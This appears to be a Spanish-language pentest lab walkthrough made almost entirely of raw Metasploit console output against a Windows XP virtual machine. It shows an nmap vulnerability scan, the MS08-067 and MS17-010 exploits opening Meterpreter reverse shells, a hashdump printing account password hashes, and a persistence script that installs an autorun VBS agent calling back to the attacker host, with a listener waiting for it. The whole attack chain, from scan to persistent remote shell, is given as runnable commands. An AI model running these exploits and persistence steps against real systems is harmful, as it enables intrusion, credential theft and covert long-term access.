Windows Ms08_067_netapi Metasploit David_Kennedy
resumen en portada
msf5 > nmap -A --script=*vuln* 192.168.56.101 [*] exec: nmap -A --script=*vuln* 192.168.56.101 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-31 14:18 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.56.101 Host is up (0.0017s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 08:00:27:46:45:AF (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Microsoft Windows XP OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 OS details: Microsoft Windows XP SP2 or SP3 Network Distance: 1 hop Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ TRACEROUTE HOP RTT ADDRESS 1 1.71 ms 192.168.56.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.18 seconds
msf5 > search ms08-067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) >
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.56.101 rhosts => 192.168.56.101 msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf5 exploit(windows/smb/ms08_067_netapi) > set lport 8080
msf5 exploit(windows/smb/ms08_067_netapi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal ... 16 Windows XP SP2 Spanish (NX) ... 40 Windows XP SP3 Spanish (NX) ... 59 Windows 2003 SP1 Spanish (NO NX) msf5 exploit(windows/smb/ms08_067_netapi) > set target 40
msf5 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.56.101 yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.56.102 yes The listen address (an interface may be specified) LPORT 8080 yes The listen port Exploit target: Id Name -- ---- 40 Windows XP SP3 Spanish (NX)
msf5 exploit(windows/smb/ms08_067_netapi) > run [*] Started reverse TCP handler on 192.168.56.102:8080 [*] 192.168.56.101:445 - Attempting to trigger the vulnerability... [*] Sending stage (179779 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.101:1035) at 2019-07-31 05:40:39 -0400 meterpreter > sysinfo Computer : XPENTST OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : es_ES Domain : GRUPO_TRABAJO Logged On Users : 2 Meterpreter : x86/windows meterpreter > meterpreter > shell Process 112 created. Channel 1 created. Microsoft Windows XP [Versi�n 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Otro Exploit
msf5 exploit(windows/smb/ms17_010_eternalblue) > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 2 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use exploit/windows/smb/ms17_010_psexec msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.56.101 rhosts => 192.168.56.101 msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.56.102 lhost => 192.168.56.102
msf5 exploit(windows/smb/ms17_010_psexec) > show options Module options (exploit/windows/smb/ms17_010_psexec): Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS 192.168.56.101 yes The target address range or CIDR identifier RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > show targets Exploit targets: Id Name -- ---- 0 Automatic 1 PowerShell 2 Native upload 3 MOF upload
msf5 exploit(windows/smb/ms17_010_psexec) > run [*] Started reverse TCP handler on 192.168.56.102:8080 [*] 192.168.56.101:445 - Target OS: Windows 5.1 [*] 192.168.56.101:445 - Filling barrel with fish... done [*] 192.168.56.101:445 - <---------------- | Entering Danger Zone | ----------------> [*] 192.168.56.101:445 - [*] Preparing dynamite... [*] 192.168.56.101:445 - [*] Trying stick 1 (x86)...Boom! [*] 192.168.56.101:445 - [+] Successfully Leaked Transaction! [*] 192.168.56.101:445 - [+] Successfully caught Fish-in-a-barrel [*] 192.168.56.101:445 - <---------------- | Leaving Danger Zone | ----------------> [*] 192.168.56.101:445 - Reading from CONNECTION struct at: 0x81d8d820 [*] 192.168.56.101:445 - Built a write-what-where primitive... [+] 192.168.56.101:445 - Overwrite complete... SYSTEM session obtained! [*] 192.168.56.101:445 - Selecting native target [*] 192.168.56.101:445 - Uploading payload... gkMkJcPE.exe [*] 192.168.56.101:445 - Created \gkMkJcPE.exe... [+] 192.168.56.101:445 - Service started successfully... [*] 192.168.56.101:445 - Deleting \gkMkJcPE.exe... [*] Sending stage (179779 bytes) to 192.168.56.101 [*] Meterpreter session 2 opened (192.168.56.102:8080 -> 192.168.56.101:1034) at 2019-07-31 14:42:27 -0400 meterpreter > meterpreter > sysinfo Computer : XPENTST OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : es_ES Domain : GRUPO_TRABAJO Logged On Users : 2 Meterpreter : x86/windows meterpreter > meterpreter > shell Process 112 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Post Explotacion
Volcado Hash de las contraseñas.
meterpreter > use priv [-] The 'priv' extension has already been loaded. meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 7a4a5e161d9912813d93fc42ab20d2c2... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrador:500:1e99d771a164613acbe7391d7f72f554:37fc36617aeeb1429f6a4cd2e3870540::: Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Asistente de ayuda:1000:3050ea1e36e45f2beda5426a9ff8502d:db6385a1ad0f46d5330e4cde96bf21bf::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:18b8af32b0f29331ed6fa91acad4ddb8::: pp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Persistencia
1) Activar persistencia.
meterpreter > run persistence -X -i 50 -p 443 -r 192.168.56.102 [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/XPENTST_20190801.0540/XPENTST_20190801.0540.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=443 [*] Persistent agent script is 99660 bytes long [+] Persistent Script written to C:\WINDOWS\TEMP\MpnJlXrxiIU.vbs [*] Executing script C:\WINDOWS\TEMP\MpnJlXrxiIU.vbs [+] Agent executed with PID 1640 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\iFKcWWwm [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\iFKcWWwm meterpreter >
2) Lanzar multihandler a la escucha
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lport 443 msf5 exploit(multi/handler) > set lhost 192.168.56.102 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.102:443
3) Esperar a que la maquina se conecte.
[*] Started reverse TCP handler on 192.168.56.102:443 [*] Sending stage (179779 bytes) to 192.168.56.101 [*] Meterpreter session 4 opened (192.168.56.102:443 -> 192.168.56.101:1042) at 2019-08-01 19:14:28 -0400 meterpreter >
Seguir trabajando:
meterpreter > sysinfo Computer : XPENTST OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : es_ES Domain : GRUPO_TRABAJO Logged On Users : 2 Meterpreter : x86/windows meterpreter > shell Process 1256 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\pp>